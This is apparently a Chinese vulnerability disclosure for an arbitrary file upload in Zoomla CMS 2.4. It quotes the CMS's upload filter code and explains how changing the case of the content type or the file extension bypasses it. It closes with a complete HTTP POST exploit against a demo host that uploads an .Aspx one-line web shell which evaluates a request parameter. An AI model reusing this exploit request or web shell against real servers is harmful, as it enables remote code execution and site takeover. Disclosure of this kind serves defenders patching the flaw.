逐浪cms 2.4某处任意文件上传

/Plugins/swfFileUpload/UploadHandler.ashx
有一个全局过滤

asp_code.dll
class ZoomlaSecurityCenter

public static void CheckUpladFiles()   {    HttpRequest request = HttpContext.Current.Request;    HttpResponse response = HttpContext.Current.Response;    if (HttpContext.Current.Request.ContentType.IndexOf("multipart/form-data") > -1)    {     HttpFileCollection files = request.Files;     for (int i = 0; i < files.Count; i++)     {      HttpPostedFile httpPostedFile = files[i];      string fileName = httpPostedFile.FileName;      if (httpPostedFile.ContentLength > 0)      {       if (fileName.IndexOf(".") > -1)       {        string[] array = fileName.Split(new char[]        {         '.'        });        for (int j = 1; j < array.Length; j++)        {         string ext = array[j].ToString().ToLower();         if (!ZoomlaSecurityCenter.ExNameCheck(ext))         {          string findStr = System.IO.Path.GetExtension(fileName).ToLower().Replace(".", "");          string text = SiteConfig.SiteOption.UploadFileExts.ToLower();          if (!StringHelper.FoundCharInArr(text, findStr, "|"))          {           function.WriteErrMsg("上传的文件不是符合扩展名" + text + "的文件");           response.End();          }         }         else         {          function.WriteErrMsg("请勿上传可疑文件！");          response.End();         }        }       }       else       {        function.WriteErrMsg("请勿上传可疑文件！");        response.End();       }      }     }    }   }

将multipart/form-data的大小写改下就可以绕过了，局部过滤，可以改文件后缀名大小写绕过

POST /Plugins/swfFileUpload/UploadHandler.ashx HTTP/1.1 Host: demo.zoomla.cn Content-Length: 263 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: null User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.81 Chrome/43.0.2357.81 Safari/537.36 Content-Type: Multipart/form-data; boundary=----WebKitFormBoundaryNyS0P5wwqaOrCYsh Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: ASP.NET_SessionId=gwezhhqzegfs5nhcpdeaso5s; bdshare_firstime=1436497685958; jiathis_rdc=%7B%22http%3A//www.zoomla.cn/down/2407.shtml%22%3A%220%7C1436497760852%22%7D; hasshown=1  ------WebKitFormBoundaryNyS0P5wwqaOrCYsh Content-Disposition: form-data; name="Filedata"; filename="name.Aspx" Content-Type: application/x-aspx  <%@ Page Language="Jscript"%><%eval(Request.Item["zsd"],"unsafe");%> ------WebKitFormBoundaryNyS0P5wwqaOrCYsh--